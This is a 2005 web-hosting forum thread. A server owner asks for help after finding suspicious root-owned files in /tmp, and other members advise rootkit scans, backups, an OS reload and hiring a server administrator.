Results 1 to 10 of 10
Thread: suspicious files on server
-
06-25-2005, 02:04 AM #1Junior Guru Wannabe
- Join Date
- Jul 2004
- Posts
- 46
suspicious files on server
Recently my dedicated server went down and i had to reboot it to get it back online.
I asked server admin people to check the reason of the same and they said :
We have found files on your machine that appear to be owned by 'root' which is signs of compromise. We highly recommend you submit an OS Reload request for to further correct the issue, as there might be miss-leading processes running that are malicious in nature.
root@jearaide [/tmp]# ll |egrep -v 'horde|impatt|core|cpanel|mysql|theme|iroha|sess|305|mt-throttle|jd|exim|lost'
total 17020
drwxrwxrwt 5 root root 65536 Jun 24 23:42 ./
drwxr-xr-x 23 root root 4096 Jun 3 13:46 ../
---------- 1 root root 1623 Jun 6 22:01 back
drwx------ 2 root root 4096 Jun 23 17:47 clamav-partial/
---------- 1 root root 28402 Jan 17 21:30 elflbl
---------- 1 root root 5208 Jun 6 21:58 ex
---------- 1 root root 28528 Jun 3 21:30 root
=============
Now os reloading wil cause all data to be lost and i don't have anybackup also...
can u suggest me a way to solve this problem owithout osreload...
or if you think that osreload is necessary than what should i do and how?
-
06-25-2005, 09:21 AM #2Junior Guru Wannabe
- Join Date
- Jun 2005
- Posts
- 46
elflbl is a known exploit and probably your box was compromised. There are tools to find some rootkits but not all.
Also, check your logs to see how that file got there. You might have a vulnerable script.
-
06-25-2005, 09:59 AM #3Junior Guru Wannabe
- Join Date
- Jul 2004
- Posts
- 46
i checked with chkrootkit but i don't find any file detected as suspicious??
can u help me plz...
where is the log file located on server through which i can check form where that suspicisous file came here?
-
06-25-2005, 10:26 AM #4Eternal Member
- Join Date
- Dec 2004
- Location
- New York, NY
- Posts
- 10,710
Do you have a second hard disk on the server? Back up all accounts to that and restore them after the OS Reload. Then, find any outdated scripts and update them. Is your provider fully managed (including server hardening)? If not, get a server admin to lock it down for you.
Thanks,MediaLayer, LLC - www.medialayer.com Learn how we can make your website load faster, translating to better conversion rates for your business!
The pioneers of optimized web hosting, featuring LiteSpeed Web Server & SSD Storage - Celebrating 10 Years in Business
-
06-25-2005, 10:46 AM #5Junior Guru Wannabe
- Join Date
- Jul 2004
- Posts
- 46
yes i have second hardidk on server...
can u tell me which folders shall i take backup on it and how??
also tellme if i am going toi get osreload than how much time my server will be offline??
and than in that case do i again need to do the settings in whm and instyall fantastico and everything as i did when i get the fresh server??
Your help is appreciated.
-
06-25-2005, 11:13 AM #6Eternal Member
- Join Date
- Dec 2004
- Location
- New York, NY
- Posts
- 10,710
Sorry, but I don't really have time to help further. You shouldn't even need to post here if you had your own server admin.
Thanks,MediaLayer, LLC - www.medialayer.com Learn how we can make your website load faster, translating to better conversion rates for your business!
The pioneers of optimized web hosting, featuring LiteSpeed Web Server & SSD Storage - Celebrating 10 Years in Business
-
06-25-2005, 11:23 AM #7Web Hosting Master
- Join Date
- Jun 2003
- Posts
- 976
Hosting Champ:
install and run rootkit hunter from http://www.rootkit.nl/projects/rootkit_hunter.html
-
06-25-2005, 06:31 PM #8Junior Guru
- Join Date
- Dec 2003
- Location
- Sunny So. Calif.
- Posts
- 213
also tellme if i am going toi get osreload than how much time my server will be offline??
You really sound like you need to hire an experienced admin! After the reload, your server needs to be locked down IMMEDIATELY or else it may be compromised again in a short time.
Better to do it right, rather than lose your business due to repeated server outages!
-
06-25-2005, 07:05 PM #9You really sound like you need to hire an experienced admin! After the reload, your server needs to be locked down IMMEDIATELY or else it may be compromised again in a short time.
Firstly, security isn't about one time and it's done. Hacks appear daily, and unless you know 100% of what you're doing, you not only need to have your server secured once, but you need to have that admin keep on the server to see what the problems are and could be.
Secondly, it's possible (not likely, but possible) that you don't need an OS reload. Again, without having an experienced admin look @ your server, you'll never know.
The first step you must take, as others have said is to find a server admin. Without that, you run a lot more risk of being just shut down than with it. Make SURE you ask the right questions of them, as in what they do, etc, and how certain things will be covered, because many "server admin's" out there simply run root checks and assume your server is secure. That's nowhere near complete.Tom Whiting, WHMCS Guru extraordinaire
Linux problems? WHMCS Problems? Give me a shout
Check out my WHMCS Addons
-
06-25-2005, 08:34 PM #10Web Hosting Master
- Join Date
- Dec 2001
- Posts
- 5,221
Greetings:
chkrootkit and rkhunter only check for root kits; they do not catch other forms of hacking.
Thank you.